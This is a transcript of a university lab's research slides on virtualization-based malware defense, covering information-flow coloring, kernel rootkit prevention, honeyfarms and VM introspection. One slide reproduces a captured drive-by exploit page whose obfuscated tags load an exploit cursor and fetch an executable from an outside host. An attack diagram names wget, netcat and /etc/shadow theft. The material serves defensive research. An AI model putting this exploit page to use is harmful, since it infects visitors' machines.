Research at FRIENDS Lab Dongyan Xu Associate Professor Department of Computer Science and Center...
-
Upload
camilla-carson -
Category
Documents
-
view
222 -
download
7
Transcript of Research at FRIENDS Lab Dongyan Xu Associate Professor Department of Computer Science and Center...
Research at FRIENDS Labhttp://friends.cs.purdue.edu
Dongyan Xu Associate ProfessorDepartment of Computer Science andCenter for Education and Research in Information Assurance and Security (CERIAS)Purdue University
Virtual Infrastructures
• VIOLIN virtual infrastructure• Infrastructure adaptation• Infrastructure snapshot• Real-world deployment (http://www.nanohub.org)
Research Overview
Malware Defense
• Honeyfarm (Collapsar) • Playground (vGround)• VM introspection (OBSERV) • OS info. flow (Proc. Coloring)• Kernel rootkit (NICKLE)• Reverse engr. (AutoFormat)
Virtualization Technology (Xen, QEMU, VirtualBox, KVM, VMware)
Project 1: Process Coloring:Information Flow-based Malware Defense
Funded by IARPA through AFRL One-sentence summary:
Propagating and logging provenance information (“colors”) along OS-level information flows for malware detection and sensitive data protection
Prototype integration with Southwest Research Institute
Demo CD completed today!
httpd
s80httpdrcinit
s45named
s30sendmail
s55sshd
s80httpd
s30sendmail
s45named
s55sshd
/bin/sh
wgetRootkitRootkit
Local filesLocal files
netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
Initial coloring
Coloring diffusion
SyscallLog
Capability 3: Color-based log
partition for contamination analysis
Capability 3: Color-based log
partition for contamination analysis
PC Usage Scenario: Server-Side Malware Defense Capability 1:
PC malware alert
“No shell process should have the color
of Apache”
Capability 1: PC malware alert
“No shell process should have the color
of Apache”
Capability 2: Color-based
identification of malware break-in point
Capability 2: Color-based
identification of malware break-in point
Demo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.htmlDemo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.html
firefox
notepad
turbotax
warcraft
Web Browser
Tax
Editor
Games
AgobotAgobot
Tax filesTax files
PC Usage Scenario: Client-Side Malware Defense
Agobot
www.malicious.net
PC malware alert
“Web browser and tax colors should never
mix”
PC malware alert
“Web browser and tax colors should never
mix”
Demo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.aviDemo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.avi
Project 2:Strategic Defense against Kernel Rootkit Attacks
Kernel rootkits: stealthy and foundational threat to cyberspace
Current defense: Symptom-based detection Disruption to production system Manual forensics
Strategic defense: Proactive indication before attack Automatic avoidance by “steering away”
production system (non-stop operation) Live forensics for future protection
Integrated Defense Scenario
Guest OS
VMM
Right before attackAfter threat indication
Production VM
Fork
Avoidance
Indication
Guest OS
VMM
Forensics VM
Guest OS
VMM
Production VM
RootkitProfile
Kernel Guarding
Code
Clean-up Forensics
Results with Real-World Kernel Rootkits
Indicating and preventing kernel rootkit attacks at VMM level
[RAID08 Best Paper Award][RAID08 Best Paper Award]
Thank you!
For more information:URL: http://friends.cs.purdue.edu (on a VM)Google: “Purdue virtualization friends”Email: [email protected]
NICKLE: Kernel Rootkit Indicator “No Instruction Creeping into Kernel Level Executed”
NICKLE
Standard memory
Kernel Code
Shadow memory
VMM
Guest OS
Step 1: Create two memory spaces Standard memory Shadow memory
Step 2: Authenticate and copy kernel code to shadow memory
Step 3: Memory access dispatch Kernel code fetch ->
shadow memory All other accesses ->
standard memory
Kernel Code
Collapsar Honeyfarm
Domain B
Domain A
Domain C
Front-End
VM-based Honeypots
Management Station
Collapsar Center
Correlation Engine
RedirectorRedirector
Collapsar Honeyfarm
Redirector
Benefit 1: Centralized management of
honeypots w/ distributed presence
Benefit 2: Off-site attack occurrence
Benefit 3: Convenience for real-time attack
correlation and log mining
[USENIX Security’04][USENIX Security’04]
Malicious Web
Server
VM-based Honeypots
Domain B
Domain A
Domain C
Front-End
Collapsar Center
RedirectorRedirector
Redirector
Collapsar as a Client-side Honeyfarm
Active Honeypots w/ Vulnerable Client-side Software Web Browsers (e.g., IE, Firefox, …) Email Clients (e.g., Outlook, …)
[ HoneyMonkey, NDSS’06]
PlanetLab (310 sites)
288 malicious sites / 2 zero-day exploits288 malicious sites / 2 zero-day exploits
Upon Clicking a malicious URL http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
22 unwanted programs installed without user’s consent!
MS04-013
MS03-011
MS05-002
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>
</body></html>
A Real Incident [JPDC’06][JPDC’06]
vGround: A Virtual Worm Playground (demo)
dallas.cs.purdue.edu
High fidelity VM: full-system virtualization
Strict confinement VN: link-layer network virtualization
Easy deployment Locally deployable
Efficient experiments Images generation time: 60 seconds Boot-strap time: 90 seconds Tear-down time: 10 seconds
A Worm Playground
In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004
[RAID’05][RAID’05]
State-of-the-art malware defense Running anti-malware software inside the
monitored system Advantage: They can see everything (e.g., files,
processes…) Disadvantage: They may not see anything!
VirusScan
FirefoxIE
OS Kernel
…
OBSERV: “Out-of-the-Box” Malware Detection
Why “Out-of-the-Box”? Current approach fundamentally flawed
Anti-malware software and protected software running at the same privilege level
Lack of root-of-trust Solution: Going “out-of-the-box”
FirefoxIE
OS Kernel
…
VirusScan
Virtual Machine Monitor (VMM)
The “Semantic-Gap” Challenge
What we can observe: Low-level states
Memory pages, disk blocks…
Low-level events Privileged instructions, Interrupts, I/O…
What we want to observe: High-level semantic states
Files, processes… high-level semantic events
System calls, context switches…
Virtual Machine Monitor (e.g., VMware, Xen)
Guest OSSemantic Gap
VirusScan
Our Solution: OBSERV OBSERV: “Out-of-the-Box” with SEmantically
Reconstructed View A new mechanism missing in existing VMMs
FirefoxIE
OS Kernel
…
Virtual Machine Monitor (VMM)
OBSERV
[ACM CCS’07][ACM CCS’07]
New Capabilities Enabled by OBSERV
Capability II: Malware detection by
view comparison
Capability II: Malware detection by
view comparison
Capability I: Invisible system
logging
Capability I: Invisible system
logging
FirefoxIE
OS Kernel
…
Virtual Machine Monitor (VMM)
OBSERV
Capability III: External run of COTS
anti-malware software
Capability III: External run of COTS
anti-malware software
OBSERV View Inside-the-boxView Diff
AutoFormat: Malware Protocol Reverse Engineering
Given malware binary, infer malware protocol format
[NDSS’08][NDSS’08]
Inferring Slapper Worm (Botnet) Protocol
Nested data structure
declaration
Compiler inserted gap
1
2
3
1
2
VIOLIN: Portable, Adaptive Virtual Environments
Adaptive Virtual Environments on a shared hosting infrastructure
Internet
DB
DB
[TR’03, IEEE Computer’05][TR’03, IEEE Computer’05]
Adaptation Architecture and Sample Scenario (Demo)
VIOLIN Switch VIOLIN Switch
Monitoring Daemon
VIOLIN Switch VIOLIN Switch
Monitoring Daemon
VIOLIN Switch VIOLIN Switch
Monitoring Daemon
Monitoring Daemon
AdaptationManager
VMs VMs
VMsVMs
PhysicalNetwork
Scale Up
CPU Update
MigrateVMM
VMMVMM
VMM
VIOLIN Switch
[IEEE ICAC’06][IEEE ICAC’06]
Live VIOLIN Snapshot (Demo)
Useful for application and OS transparent recovery from Crashes, failures, and disasters Unexpected power/network outage And for VIOLIN replay
Hosting center Hosting center
Snapshot Resume
[ACM/IEEE VTDC’07][ACM/IEEE VTDC’07]